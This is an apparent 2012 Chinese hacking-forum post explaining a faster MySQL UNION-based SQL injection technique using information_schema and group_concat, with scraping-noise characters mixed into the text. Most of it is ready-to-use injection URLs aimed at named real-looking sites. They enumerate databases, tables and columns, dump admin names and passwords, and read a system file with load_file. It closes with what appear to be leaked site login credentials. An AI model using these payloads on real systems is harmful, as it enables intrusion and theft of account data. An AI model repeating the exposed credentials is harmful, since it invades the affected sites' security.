找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2180|回复: 0
打印 上一主题 下一主题

mysql注入高效方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:37:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似8 z( [/ ^& H  b- ^8 J" V6 ~1 I
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
$ Y! H- p# h6 Y0 T) e# v% X+ n3 z" c( L7 M+ ^. g! ~' \# h2 d8 S. q1 L

- h' h. S, C8 @优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
, C! R$ D, Q7 |7 Z  r
0 C0 H( k% T. S: G+ Y$ x缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...% p$ y' O* I. y1 \' ~
  @6 G8 r. |6 ^$ {- R
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示, U; M) {1 _8 @* i1 b
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等
! q" w1 [- |. q' }. j2 m
+ g$ j& o2 x, C, f! \http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
) b6 A2 }& @9 C( P' r( f. @9 d/ f  C3 |' j/ V: U
读出所有库:, M8 c, q1 b# U; ~
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA/ H  f  f# y# @+ ]' U% D0 M

- C, K& ^0 ^7 C
0 e7 |' n8 a! y6 g& |2 q$ \  ~. A( E( f3 [& m* m) S9 E; ?
读出所有表:( _5 N; j- [- \4 h) x6 h- Y
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()0 F% U' A$ }! \' e# l

2 n0 k9 g8 u8 |读出所有表字段:
* i/ \& l# A6 Y, C4 {; n% Dhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
( K9 V! ?" P' ~; z* t$ N*/ (97,100,109,105,110)为admin的ascii码 依次类推) u+ B" P9 l! i1 |. j, }

; Z: y+ D" ^- S( u8 m读出所有表字段里的内容:
; V4 q* L2 }% s5 d* j  ]http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin3 |2 t% r: H& K: \: S

) @! R/ H+ r: ]; F' g) T# ?8 d+ L: G; D5 C; w

) P, D3 P5 |: g9 F9 K- o  S" X; j+ O8 ~! ]
4 s% I' D( H7 u$ v; I

) C9 a" N1 y- k% q( p0 Q1 Nhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%233 w: J: n: b) c& z' L

: ~# k( \3 l, u; s2 \) w6 o! Q9 D2 l& A3 _) [5 o1 x
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23  z7 f7 q* G; i1 F  E* e1 ?
* B( c, p# g9 Z
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23& {, \  F3 A, L7 N: r$ g$ x7 U

. x8 `0 Q; x) _" ]3 _" c7 f: \: {8 N- I3 f3 V1 b
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
- J) U# I" \+ h7 s0 u# u' o/ q/ H$ a9 j+ d
* |& T& O/ o% ?9 i+ s$ u! X( R: @$ D
        webmaster:dzb521123,simlab:simadmin200432337 Y! N# d! L. P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表